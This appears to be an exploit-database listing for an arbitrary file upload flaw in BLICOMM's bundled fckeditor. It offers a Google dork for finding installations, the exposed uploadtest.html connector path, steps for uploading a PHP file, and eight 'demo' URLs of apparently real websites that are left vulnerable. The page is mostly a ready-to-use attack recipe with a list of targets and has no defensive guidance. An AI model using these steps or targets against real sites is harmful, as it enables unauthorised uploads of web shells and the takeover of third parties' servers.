Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-264 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2015-04-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
####################################################### #BLICOMM (fckeditor) Arbitrary File Upload Vulnerability ####################################################### ############################################ # Exploit Title: BLICOMM (fckeditor) # Google Dork : inurl:index.php?idLingua=2 # Date: 09/04/2015 # Author: Ashiyane Digital Security Team # Vendor Homepage : http://blicomm.net # Version: All Version # Tested On : Windows 7 / Mozilla Firefox ############################################ ######## # exploit => includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # first go to => http://site.com/[path] # # then => http://www.site.com/[path]/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # select => Select the "File Uploader"> php ... upload to : Uploaded File URL: ######## ######## # Demo 1 : http://reliXlax.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 2 : http://reXef-international.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 3 : http://kXcantincendi.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 4 : http://giussani.itX/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 5 : http://acovent.Xcom/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 6 : http://factoedXizioni.it/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 7 : http://ialungXobus.it/includes/fckeditor/editor/filemanager/connectors/uploadtest.html # # Demo 8 : http://siproXsrl.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html ######## [+][+][+][+][+][+][+][+][+][+][+][+] Discovered By : Cyb3r_Dr4in [+][+][+][+][+][+][+][+][+][+][+][+]
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.